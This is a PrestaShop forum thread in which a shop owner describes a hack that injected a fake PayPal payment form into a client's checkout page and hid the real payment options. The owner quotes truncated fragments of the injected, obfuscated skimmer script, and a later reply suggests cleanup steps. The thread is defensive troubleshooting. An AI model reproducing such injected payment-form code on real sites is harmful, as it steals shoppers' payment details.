Jump to content

Fake Paypal payment form at order page, other payment modules not see at site.


skur2000

Recommended Posts

Hi friends.

old client site at prestashop 1.6.1.7 with custom - was attacked.

paypal module - not installed, paypal payment way on site - not integrated.

but at payment form https://xxxxxxxxxx.ua/quick-order

we see fake paypal form (screen)

(really at this site have other standart pay modules -  bank, cheque, and COD, but - They not visible!)

in sources page see bad codes(code listing),

we scan and find this with other variants and variables - nothing.

cleaning.zip - see more suspiciously files, but they not have bad codes (custom modules and theme)

has anyone encountered this ?

way to resolve this ?

----

how add example ?

script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="5d9bdb33b8cdd84910e78b76-|49">/script

body onload="WindowPaymentPaypal();

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(document).ready(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(window).load(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" var full = '--'; var _0xd951=

var _0x3977=["\x69\x6E\x70\x75\x74","\

and more 

fake-paypal-form.png

Edited by skur2000
i edit url order page at site (see edit history)
Link to comment
Share on other sites

7 hours ago, skur2000 said:

Hi friends.

old client site at prestashop 1.6.1.7 with custom - was attacked.

paypal module - not installed, paypal payment way on site - not integrated.

but at payment form xxxxxxxxxxxxxxxxxxxxx

we see fake paypal form (screen)

(really at this site have other standart pay modules -  bank, cheque, and COD, but - They not visible!)

in sources page see bad codes(code listing),

we scan and find this with other variants and variables - nothing.

cleaning.zip - see more suspiciously files, but they not have bad codes (custom modules and theme)

has anyone encountered this ?

way to resolve this ?

----

how add example ?

script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="5d9bdb33b8cdd84910e78b76-|49">/script

body onload="WindowPaymentPaypal();

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(document).ready(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" $(window).load(function(){WindowPaymentPaypal();});/script>

script type="5d9bdb33b8cdd84910e78b76-text/javascript" var full = '--'; var _0xd951=

var _0x3977=["\x69\x6E\x70\x75\x74","\

and more 

fake-paypal-form.png

 

careful the cart link still points to your website

  • Like 1
Link to comment
Share on other sites

  • 11 months later...

Just had this virus on one of my customer's PS 1.6. shops. It helped to upload a clean /tools folder and add a patch to smarty.config.inc.php. It's also good to analyze the logs in case the attack came through some module.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...